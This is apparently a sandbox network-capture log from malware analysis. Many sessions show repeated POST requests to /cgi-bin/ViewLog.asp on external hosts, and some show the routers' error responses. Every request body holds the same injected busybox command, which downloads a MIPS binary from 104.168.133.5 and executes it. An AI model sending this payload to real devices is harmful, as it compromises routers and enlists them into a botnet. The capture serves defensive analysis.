                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.470643044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:58.502631903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.590480089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.742415905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              126192.168.2.135708262.78.36.1308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.347312927 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.391468048 CET308INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              Date: Thu, 23 Nov 2023 04:19:12 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              127192.168.2.134797494.121.70.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.349904060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              128192.168.2.134530231.14.115.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.401773930 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.678050995 CET396INHTTP/1.1 501 Not Implemented
                                              Cache-Control: no-store
                                              Connection: close
                                              Content-Length: 137
                                              Date: Thu, 23 Nov 2023 04:15:34 GMT
                                              Expires: 0
                                              Pragma: no-cache
                                              X-Frame-Options: sameorigin
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!doctype html><html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              129192.168.2.133417095.87.94.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.406735897 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              130192.168.2.133329685.95.152.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.471261978 CET326INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              Date: Thu, 23 Nov 2023 04:16:16 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              131192.168.2.133737094.238.153.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.754566908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.310592890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.398592949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              132192.168.2.134987631.136.221.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.762255907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.342586994 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.498594046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.862585068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.470611095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.686597109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.398525953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.262418985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              133192.168.2.135806494.127.134.108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.771476030 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              134192.168.2.135060694.121.113.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.795922041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              135192.168.2.134913431.132.164.1308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.797729015 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.017843962 CET375INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 14:16:33 GMT
                                              Server: Boa/0.94.13
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
